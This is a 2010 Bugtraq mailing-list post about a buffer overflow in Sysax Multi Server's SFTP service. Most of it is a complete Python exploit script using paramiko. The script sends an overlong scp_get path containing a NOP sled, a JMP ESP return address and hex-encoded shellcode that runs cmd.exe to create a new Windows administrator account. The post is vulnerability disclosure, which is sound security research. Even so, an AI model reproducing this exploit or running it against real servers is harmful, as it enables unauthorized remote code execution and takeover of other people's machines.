Message-ID: <20100626234559.11062.qmail@securityfocus.com>
Date: 26 Jun 2010 23:45:59 -0000
From: rob@...ensussecurity.com
To: bugtraq@...urityfocus.com
Subject: Re: Sysax Multi Server "open", "unlink", "mkdir", "scp_get"
 Commands DoS Vulnerabilities

Assuming the server is running as admin the overflow can actually be used to execute arbitrary code.  In our example we spawn an instance of cmd.exe and create a new admin, Billyboy, with a password of woot. 

This has been tested with Windows XP SP2.  

+-------- Start Exploit --------+

import paramiko
import sys	

t_ip = "192.168.1.104"			#target IP
t_port = 4019					#target port
password = "asdf"				#Known user
username = "asdf"				#password for user

transport = paramiko.Transport((t_ip, t_port))
transport.connect(username = username, password = password)
sftp = paramiko.SFTPClient.from_transport(transport)

sftp.chdir("./")				#Execute a good command
buff_pen = "\x90" * 389
buff_pen += "\x65\x82\xa5\x7c"	#Point EIP to JMP ESP command in shell32.dll
buff_pen += "\x90" * 3
buff_pen += "\xeb\x13\x5b\x31\xc0\x50\x53\xbb\x4d\x11\x86\x7c\xff\xd3\xbb\xa2\xca\x81\x7c\xff\xd3\xe8\xe8\xff\xff\xff\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x42\x69\x6c\x6c\x79\x62\x6f\x79\x20\x77\x6f\x6f\x74\x20\x2f\x41\x44\x44\x20\x26\x26\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f\x75\x70\x20\x41\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f\x72\x73\x20\x2f\x41\x44\x44\x20\x45\x78\x70\x41\x64\x6d\x69\x6e\x00"  #Shellcode to make a new admin, billyboy, with a password of 'woot'
buff_pen += "\x90" * 3
buff_pen += "\xcc" * (800 - len(buff_pen))
sftp.get(buff_pen)

+-------- Stop Exploit --------+

Powered by blists - more mailing lists